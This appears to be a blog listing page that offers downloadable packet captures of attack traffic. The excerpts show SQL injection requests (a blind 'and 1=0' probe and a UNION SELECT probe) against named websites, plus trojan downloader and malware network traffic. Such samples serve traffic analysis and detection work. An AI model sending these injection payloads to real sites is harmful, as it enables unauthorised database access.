Cyber Security Trends in 2016 – Denial of Service and Webshells on the rise

According to several security research firms 2015 saw a massive decline in the number of reported malware infections, a decline in exploit activity of 84% compared to that of 2013. The few active exploit kits worth noting were Angler, Neutrino and Rig but besides those three there were virtually no other major campaigns detected in… Read More »

Share Button

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

Download Active Business DIrectory Remote Blind SQL Injection PCAP : remoteblindsql.pcap     2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 .. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 Host: www.activewebsoftwares.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8… Read More »

Share Button

Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli 2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 .. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 Host: www.musicza.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset:… Read More »

Share Button

Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample : kaixin.pcap   2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0..@………w……P…=….p…f……….. 2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0 E..0X\..o…w……..P..8……>p.@..y………. 2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win… Read More »

Share Button

Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP : zemot.pcap E..(..@….A…..wi..t.P…… .P….=…….. 2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1 E..M..@……….wi..t.P…… .P…….GET /b/shoe/749634 HTTP/1.1 Accept: */* Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152;… Read More »

Share Button